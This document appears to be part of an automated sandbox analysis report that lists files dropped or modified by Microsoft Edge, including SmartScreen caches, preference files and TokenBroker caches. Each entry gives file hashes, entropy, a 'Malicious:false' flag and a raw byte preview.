                                                                                                                                                                                                                                                                  Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\downloadCache

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):14
                                                                                                                                                                                                                                                                  Entropy (8bit):3.3787834934861767
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:ZK7q6:ZA
                                                                                                                                                                                                                                                                  MD5:DF741B3F19D9DC2621EAF973C8C9FA9D
                                                                                                                                                                                                                                                                  SHA1:F45F1D9791C05366A8A23322D497C89957E75E61
                                                                                                                                                                                                                                                                  SHA-256:6E5DDBA6D7AA3B287EA364034E1F843E4146FF92C07D8426F4A7C4B0E6435006
                                                                                                                                                                                                                                                                  SHA-512:650DE3F99038BFFBFEF41A9ACC0A06E15803550C6456D0BDEAC9EBE18AEA94AB3A0BB7D85B7A0230CE6F510F5E26FA739FE58924F355D7E3714EC37DAA4C70D2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:downloadCache_

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\downloadCache_

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                  Entropy (8bit):5.003849613539181
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfPQTwmjOAozRLuLgfGBkGAeekVy8Hfjg9PIAclRWVdUdRNn:YWLSGTocAo9LuLgfGBPAzkVj/EMlkVd2
                                                                                                                                                                                                                                                                  MD5:925B3E8971081685FF4CC7B5191FF663
                                                                                                                                                                                                                                                                  SHA1:A2E65D35FFB8BAEC2FBB820652B01B01CE47CAD5
                                                                                                                                                                                                                                                                  SHA-256:9006EDACFF44926F32C0F27E2BF6F3DD11BD4CC469DB0881304CA09075FD880A
                                                                                                                                                                                                                                                                  SHA-512:F15255E7814EDB96C87F8520793C9AFEB03AEE84C622C2318E7BFA6EDB2CF4533AA93F5B49CABAB31F804664214EEAFC3BE6B4DFF3C0A9C8C4753438CE0A1571
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"76e68f5651c70d04","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":0,"expiration_time":1734713072631843}]}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:uriCache_

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                  Entropy (8bit):4.9801141382571315
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfPQTwmjOAozRLuLgfGBkGAeekVy8HfzXNPIAclRWViHbV:YWLSGTocAo9LuLgfGBPAzkVj/T8lkVup
                                                                                                                                                                                                                                                                  MD5:2DC6A5B261DFA4176E2EB16812BCD9B2
                                                                                                                                                                                                                                                                  SHA1:DEB86C6B6129A8CFBF08F1F6EEE971B9505BA150
                                                                                                                                                                                                                                                                  SHA-256:D48F82975E98264F439BEBE6F258459F645D26E477346E0B5EAB06317C375711
                                                                                                                                                                                                                                                                  SHA-512:0D63523FBD711B056AA92B7485E1C3E53F5FC491AA3EA4465E1D45D240851ADA7DE0CD249C00441B95C5E351D26E1FA50B65F2441544A7FA372B644D22D7E56C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"76e68f5651c70d04","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734713072062227}]}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):85
                                                                                                                                                                                                                                                                  Entropy (8bit):4.3488360343066725
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQw:YQ3Kq9X0dMgAEiLI2
                                                                                                                                                                                                                                                                  MD5:265DB1C9337422F9AF69EF2B4E1C7205
                                                                                                                                                                                                                                                                  SHA1:3E38976BB5CF035C75C9BC185F72A80E70F41C2E
                                                                                                                                                                                                                                                                  SHA-256:7CA5A3CCC077698CA62AC8157676814B3D8E93586364D0318987E37B4F8590BC
                                                                                                                                                                                                                                                                  SHA-512:3CC9B76D8D4B6EDB4C41677BE3483AC37785F3BBFEA4489F3855433EBF84EA25FC48EFEE9B74CAB268DC9CB7FB4789A81C94E75C7BF723721DE28AEF53D8B529
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\cd575a30-cf40-41b5-82e8-9b9a3ffa69e1.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):45827
                                                                                                                                                                                                                                                                  Entropy (8bit):6.088045812974999
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:gMkbJrT8IeQc5dKuqPi1zNt99cH6sFATQhv5ZMCiokJDSgzMMd6qD47u30p:gMk1rT8H1KknQh3MFoktSmd6qE7P
                                                                                                                                                                                                                                                                  MD5:77462890CDAFCF9383F68175A4D23933
                                                                                                                                                                                                                                                                  SHA1:A14BAE582BFB7158AE253788341459882F4B1E40
                                                                                                                                                                                                                                                                  SHA-256:416CED6FEF110B14D2B81EAD41EED461AF14C78BC81DEF37C9E89F0D4D440CC6
                                                                                                                                                                                                                                                                  SHA-512:17C291FC8C8851389E0A5B19AE67F134EF75E4AC28D73660DEB8FDD5737EC4A39BB51DDD9C88C6C9323614E3050D2E824BDAE0F812F02752977C1F07F9C99DF5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379085864348925","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734612268"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\da77ece8-622a-4397-81d9-0d1e8cc59260.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):44870
                                                                                                                                                                                                                                                                  Entropy (8bit):6.095454123803136
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWe0i1zNt9NBHD+73GkKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn18KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:5CF8006DF720A43AC3BFA15E8B6452F2
                                                                                                                                                                                                                                                                  SHA1:0F8C945B9294F5B395BE8AC3BB3CE657B9F0A2AC
                                                                                                                                                                                                                                                                  SHA-256:D3A6F3B27EE8284D4FAB7B670E32CE645D4E2752174E2EBE81CD3FD6931097E3
                                                                                                                                                                                                                                                                  SHA-512:A1BCAC252AA5AC4172934E95BF0A8A7D97146E183DC32C1EF56655EDF9C9DA805112DCC07738E6B3892238C47807565A7B6BF47892C03F29A8DEA2B66D87561D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\dc4051a8-3573-4731-8c48-08049c51981f.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089783421352068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5EkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:1716B7F7F23A5073C1EAF40BD983FF39
                                                                                                                                                                                                                                                                  SHA1:D39AEC898E96949C275407978EF19AAE48116E08
                                                                                                                                                                                                                                                                  SHA-256:9221B31FD33C972166CDA29BE37D6DE3EB5CE606EDF4EC309F2DE1A78A09AFCF
                                                                                                                                                                                                                                                                  SHA-512:48DFF35333ACEFD29420D3344F4CFF93A48204548284DF3503C3DB7F17E9869581C24C2DB10DF2646B1AC7383057B21C3BF6E2CB7D9B1B1F7B00B1828FAF8E63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8433941614406093
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxzxl9Il8u/KdKoS+ZfpYCjessz91d1rc:miYpKdKoNZfCHs
                                                                                                                                                                                                                                                                  MD5:EFD4AED1D4A26B446E65C4D38965072E
                                                                                                                                                                                                                                                                  SHA1:6348CDBEC21E05961957A3467CDA446F1FBB0217
                                                                                                                                                                                                                                                                  SHA-256:B4A7C70B491D7F93144BA1DFA29D01E33F4A4ED4A703CB7D3374B2BEABD81407
                                                                                                                                                                                                                                                                  SHA-512:EEDEAB62B67BCEA50B2D2B2616B0CDBBAA6E6880DC3359BE4806A67EB162903FC0F1CFC0E32DE8D0AC03FDA883A9E1CD4CBC93A68EAE1D0815F4D7CCD2400850
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.B.l.k.H.h.x.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.m.Z.d.P.c.q.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):4622
                                                                                                                                                                                                                                                                  Entropy (8bit):3.9973237291505166
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:qYpKZlC61fD8L/W5eXJj9PyEpvFHwqGWzN2NRkQ:qaIM+fDGW5eZj91DHoCu
                                                                                                                                                                                                                                                                  MD5:CF1B7EC95A44652CC5D214DADB7DFB2A
                                                                                                                                                                                                                                                                  SHA1:008EC723951203E1641ED35831792BA060310581
                                                                                                                                                                                                                                                                  SHA-256:325D4A546623180CB4121138DA56D0544FD0AD7D30F46EBCA914F3AA112840F9
                                                                                                                                                                                                                                                                  SHA-512:9FF303EED98F429E00187C1885C0AF110A0A51C0AD810184A0D049FB005711081D945F6F008695E6FD167056393B4541F7939828457A53C5AFFE5E998F88EC7D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".O.R.p.Z.B.B.R.S.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.m.Z.d.P.c.q.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2684
                                                                                                                                                                                                                                                                  Entropy (8bit):3.901977769352299
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKx68Wa7xfpxl9Il8u/KaMV72PpvtMZwmCGtXewid1YZUUpXxOd/vc:aFdYpKbpGtM+qtXewid1YZUwXxb
                                                                                                                                                                                                                                                                  MD5:8AF5D3DAC1FF6EABB99E3AF162210EA3
                                                                                                                                                                                                                                                                  SHA1:B315FE491B77FAE0DB860B6D40081464EFF0A820
                                                                                                                                                                                                                                                                  SHA-256:B777B29DD08AE55B1A5C1CB793F2F5867DDB992B48C6CCBA87474A835864141A
                                                                                                                                                                                                                                                                  SHA-512:4F2AC051DBA3D2072C9532F7945E6CF00B6E1EB48211D6CB100AA331A7AD5D15E68AEE559A03FA3D7D988E84C6ADE48938421CC1850FC477060D2F96D89A9682
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".G.M.j.J.N.O.V.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.m.Z.d.P.c.q.

